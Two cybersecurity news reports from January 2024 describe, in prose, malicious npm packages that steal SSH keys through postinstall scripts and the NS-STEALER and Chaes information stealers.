Jan 23, 2024NewsroomSoftware Security / Supply Chain

Two malicious packages discovered on the npm package registry have been found to leverage GitHub to store Base64-encrypted SSH keys stolen from developer systems on which they were installed.

The modules named warbeast2000 and kodiak2k were published at the start of the month, attracting 412 and 1,281 downloads before they were taken down by the npm maintainers. The most recent downloads occurred on January 21, 2024.

Software supply chain security firm ReversingLabs, which made the discovery, said there were eight different versions of warbeast2000 and more than 30 versions of kodiak2k.

Both the modules are designed to run a postinstall script after installation, which is designed to retrieve and execute two different JavaScript files.

While warbeast2000 attempts to access the private SSH key, kodiak2k is designed to look for a key named “meow,” raising the possibility that the threat actor likely used a placeholder name during the early stages of the development.

“This second stage malicious script reads the private SSH key stored in the id_rsa file located in the <homedir>/.ssh directory,” security researcher Lucija Valentić said. “It then uploaded the Base64-encoded key to an attacker-controlled GitHub repository.”

Subsequent versions of kodiak2k were found to execute a script found in an archived GitHub project hosting the Empire post-exploitation framework. The script is capable of launching the Mimikatz hacking tool to dump credentials from process memory.

“The campaign is just the latest example of cybercriminals and malicious actors using open source package managers and related infrastructure to support malicious software supply chain campaigns that target development organizations and end-user organizations,” Valentić said.

Jan 22, 2024NewsroomBrowser Security / Cyber Threat

Cybersecurity researchers have discovered a new Java-based “sophisticated” information stealer that uses a Discord bot to exfiltrate sensitive data from compromised hosts.

The malware, named NS-STEALER, is propagated via ZIP archives masquerading as cracked software, Trellix security researcher Gurumoorthi Ramanathan said in an analysis published last week.

The ZIP file contains within it a rogue Windows shortcut file (“Loader GAYve”), which acts as a conduit to deploy a malicious JAR file that first creates a folder called “NS-<11-digit_random_number>” to store the harvested data.

To this folder, the malware subsequently saves screenshots, cookies, credentials, and autofill data stolen from over two dozen web browsers, system information, a list of installed programs, Discord tokens, Steam and Telegram session data. The captured information is then exfiltrated to a Discord Bot channel.

“Considering the highly sophisticated function of gathering sensitive information and using X509Certificate for supporting authentication, this malware can quickly steal information from the victim systems with [Java Runtime Environment],” Ramanathan said.

“The Discord bot channel as an EventListener for receiving exfiltrated data is also cost-effective.”

The development comes as the threat actors behind the Chaes (aka Chae$) malware have released an update (version 4.1) to the information stealer with improvements to its Chronod module, which is responsible for pilfering login credentials entered in web browsers and intercepting crypto transactions.

Infection chains distributing the malware, per Morphisec, leverage legal-themed email lures written in Portuguese to deceive recipients into clicking on bogus links to deploy a malicious installer to activate Chae$ 4.1.

But in an interesting twist, the developers also left behind messages for security researcher Arnold Osipov – who has extensively analyzed Chaes in the past – expressing gratitude for helping them improve their “software” directly within the source code.